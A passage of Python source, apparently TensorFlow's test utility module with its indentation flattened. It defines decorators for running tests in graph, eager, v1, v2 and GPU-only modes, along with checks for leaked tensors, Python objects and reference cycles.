new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
"""Context manager to skip cases not considered failures by the tests.
Note that this does not work if used in setUpClass/tearDownClass.
Usage in setUp/tearDown works fine just like regular test methods.
Args:
test_obj: A test object provided as `self` in the test methods; this object
is usually an instance of `unittest.TestCase`'s subclass and should have
`skipTest` method.
error_type: The error type to skip. Note that if `messages` are given, both
`error_type` and `messages` need to match for the test to be skipped.
messages: Optional, a string or list of strings. If `None`, the test will be
skipped if `error_type` matches what is raised; otherwise, the test is
skipped if any of the `messages` is contained in the message of the error
raised, and `error_type` matches the error raised.
Yields:
Nothing.
"""
if messages:
messages = nest.flatten(messages)
try:
yield
except error_type as e:
if not messages or any(message in str(e) for message in messages):
test_obj.skipTest("Skipping error: {}: {}".format(type(e), str(e)))
else:
raise
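# Illustrative usage sketch for `skip_if_error` above; the remote-worker helper
# is a hypothetical name:
#
#   with skip_if_error(self, errors.UnavailableError, "Connection reset"):
#     self._connect_to_remote_worker()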
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
Args:
func: The function to test.
    warmup_iters: The number of warmup iterations, excluded from the measurement.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
        # Run the test `warmup_iters` times as a warmup, in an attempt to fill
        # up caches, which should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
f(self, *args, **kwargs)
# Since we aren't in the normal test lifecycle, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
        # _get_object_count_by_type() itself creates some new objects, so call
        # it once here and keep the result as a baseline.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
# Make sure any registered functions are cleaned up in the C++ runtime.
registered_function_names = context.context().list_function_names()
# unittest.doCleanups adds to self._outcome with each unwound call.
# These objects are retained across gc collections so we exclude them
# from the object count calculation.
obj_count_by_type = _get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped))
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Since we aren't in the normal test lifecycle, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
obj_count_by_type = (
_get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped)) -
obj_count_by_type)
# There should be no newly registered functions hanging around.
leftover_functions = (
context.context().list_function_names() - registered_function_names)
assert not leftover_functions, (
"The following functions were newly created: %s" %
leftover_functions)
        # In some cases (specifically on MacOS), the count for some object
        # types can somehow end up smaller after the test than before it.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except (ReferenceError, AttributeError):
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, denylist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(denylist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in denylist:
if b is obj:
return "<test code>"
if obj is denylist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, denylist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
denylist: same as denylist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, denylist):
return "{}{}".format(get_ignore_reason(obj, denylist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, denylist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
denylist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
denylist = denylist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, denylist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, denylist)
reprs[r_id] = describe(r, denylist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
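# Worked example for `_combine_named_parameters` above:
#   _combine_named_parameters(mode=["graph", "eager"], use_gpu=True)
# returns
#   [OrderedDict([("mode", "graph"), ("use_gpu", True)]),
#    OrderedDict([("mode", "eager"), ("use_gpu", True)])]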
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
  WARNING: This decorator can only be used in test cases that statically check
  the generated graph. Attempting to evaluate graph or function results via
  session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
        raise ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
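# Usage sketch for `py_func_if_in_function`: a standalone check that keeps
# working when called from inside a tf.function, because it is then executed
# through a py_func. The helper name is hypothetical and assumes the `np`
# import already present in this module.
@py_func_if_in_function
def _example_check_all_positive(t):
  # np.asarray handles eager Tensors and the numpy arrays a py_func receives.
  values = np.asarray(t)
  assert np.all(values > 0), "expected strictly positive values"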
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
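# Usage sketch for `run_deprecated_v1` (alias of `deprecated_graph_mode_only`):
# the hypothetical test below relies on graph construction, so the decorator
# guarantees it never runs eagerly. Assumes the `context`, `ops` and
# `googletest` imports already present in this module.
class _ExampleGraphOnlyTest(googletest.TestCase):

  @run_deprecated_v1
  def test_builds_a_graph(self):
    self.assertFalse(context.executing_eagerly())
    c = ops.convert_to_tensor(3.0)
    # The result is a symbolic tensor in the default graph, not a value.
    self.assertIs(c.graph, ops.get_default_graph())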
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
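# Usage sketch for `run_v1_only`: the hypothetical test below exercises
# v1-only behaviour and is skipped under v2. Assumes the `tf2` and
# `googletest` imports already present in this module.
class _ExampleV1OnlyTest(googletest.TestCase):

  @run_v1_only("Hypothetical: relies on v1-only graph behaviour")
  def test_v1_behavior(self):
    self.assertFalse(tf2.enabled())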
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
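# Usage sketch for `run_v2_only`, the counterpart of the example above: the
# hypothetical test runs only when v2 behaviour is enabled. Assumes the `tf2`
# and `googletest` imports already present in this module.
class _ExampleV2OnlyTest(googletest.TestCase):

  @run_v2_only
  def test_v2_behavior(self):
    self.assertTrue(tf2.enabled())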
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
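# Usage sketch for `run_gpu_only`: the hypothetical test below is skipped on
# machines without a GPU. Assumes the `context`, `ops`, `math_ops` and
# `googletest` imports already present in this module.
class _ExampleGpuOnlyTest(googletest.TestCase):

  @run_gpu_only
  def test_add_on_gpu(self):
    with context.eager_mode(), ops.device("/device:GPU:0"):
      result = math_ops.add(1.0, 2.0)
    self.assertEqual(3.0, result.numpy())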
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function will
also return False. Use `tf.test.is_built_with_cuda` to validate whether
TensorFlow was built with CUDA support.
For example,
>>> gpu_available = tf.test.is_gpu_available()
>>> is_cuda_gpu_available = tf.test.is_gpu_available(cuda_only=True)
>>> is_cuda_gpu_min_3 = tf.test.is_gpu_available(True, (3,0))
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading: the routine will
return True when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support. However, no changes are made here
because:
++ Changing the name "cuda_only" to something more generic would break
backward compatibility.
++ Adding an equivalent "rocm_only" would require the implementation to check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility.
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only".
Returns:
True if a GPU device of the requested kind is available.
"""
# This was needed earlier when we had support for SYCL in TensorFlow.
del cuda_only
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
